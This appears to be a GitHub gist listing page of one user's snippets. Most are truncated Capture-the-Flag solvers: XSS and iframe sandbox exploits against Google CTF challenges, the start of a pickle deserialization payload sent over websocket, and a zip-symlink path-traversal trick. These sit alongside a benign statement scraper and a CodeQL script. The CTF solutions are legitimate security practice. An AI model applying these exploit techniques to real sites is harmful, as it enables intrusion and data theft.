Skip to content

Instantly share code, notes, and snippets.

@tyage
tyage / xss.html
Created June 29, 2024 05:16
Google CTF 2024 Game Arcade solver
<body>
<iframe id="frame1"></iframe>
<iframe id="frame2"></iframe>
<script>
function arrayToBase36(arr) {
return arr
.reduce((a, b) => BigInt(256) * a + BigInt(b), BigInt(0))
.toString(36);
}
@tyage
tyage / main.js
Last active June 29, 2024 05:16
Google CTF 2024 PostViewer v3 solver
// Locate this file in https://storage.googleapis.com
const evaluatorHtml = `
<html>
<head>
<meta charset="utf-8">
<title>Evaluator</title>
<script>
onmessage = e => {
from http.server import HTTPServer
from http.server import BaseHTTPRequestHandler
import requests
import sys
import re
import base64
import websocket
import time
import threading
import json
meisai = [...document.querySelectorAll('#meisaiTable tbody tr')]
.filter(tr => tr.id === '')
.map(tr => [...tr.querySelectorAll('td')])
.map(tds => {
const date = tds[1].textContent
const content = tds[2].textContent
const price = tds[7].textContent.replaceAll(/\s/gi, '')
return `${date}\t${content}\t\tクレジットカード:ANAゴールドカード\t${price}`
})
.join('\n')

zipviewer-version-citizen

To solve the challenge we need to upload a symlink file in zipfile.

When we upload zipfile, it will be unzipped and then, symlink in zipfile will be deleted. But if the entry name contains ../, symlink will not be deteled.

Therefore we create a symlink entry foo/../bar in zipfile.

@tyage
tyage / obelix-template.yml
Created September 3, 2023 05:37
Midnight Sun CTF 2023 Finals - Web Obelix
AWSTemplateFormatVersion: 2010-09-09
Description: A kick-ass cloud app for hacker movienights!
Parameters:
AppName:
Type: String
Default: api-movies
Description: Name of application.
StageName:
Type: String
Default: prod
<body>
<script>
const sleep = (time) => new Promise((resolve) => setTimeout(resolve, time))
const frame = document.createElement('iframe');
frame.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`;
document.body.appendChild(frame);
const frame2 = document.createElement('iframe');
frame2.src = `https://sbx-hoge.postviewer2-web.2023.ctfcompetition.com/shim.html?o=${encodeURIComponent(location.origin)}`;
frame2.setAttribute('sandbox', 'allow-downloads allow-downloads-without-user-activation allow-forms allow-modals allow-orientation-lock allow-pointer-lock allow-popups allow-popups-to-escape-sandbox allow-presentation allow-same-origin allow-scripts allow-storage-access-by-user-activation allow-top-navigation allow-top-navigation-to-custom-protocols')
from websocket import create_connection
from base64 import b64encode, b64decode
import pickle
ticket = 'ticket{}'
ws = create_connection("ws://localhost:8081/ws/", subprotocols=[ticket])
PICKLE_OP_NAMES = {
"MARK": '(',
@tyage
tyage / autoql.sh
Last active January 12, 2023 08:26
Automatically analyze generated codeql db
REPO=$1
REPO_DIR=repos/$REPO/
rm -rf $REPO_DIR
mkdir -p $REPO_DIR
cd $REPO_DIR
git clone --depth 1 "https://github.com/$REPO"
curl "https://api.github.com/repos/$REPO/code-scanning/codeql/databases/javascript" -H "accept: application/zip" -L -o codeqldb.zip
unzip -q codeqldb.zip
codeql database analyze ./javascript codeql/javascript-queries --format=sarif-latest --output=codeql.sarif --download
@tyage
tyage / solve.html
Last active December 12, 2021 05:56
x-note
<script>
chars = '_0123456789abcdefghijklmnopqrstuvwxyz'.split('')
//chars = '_012345678'.split('')
//chars = '9abcdefgh'.split('')
//chars = 'ijklmnopq'.split('')
//chars = 'rstuvwxyz}'.split('')
let prefix = 'SECCON{'
for (let char of chars) {
setTimeout(() => {
let trial = `${prefix}${char}`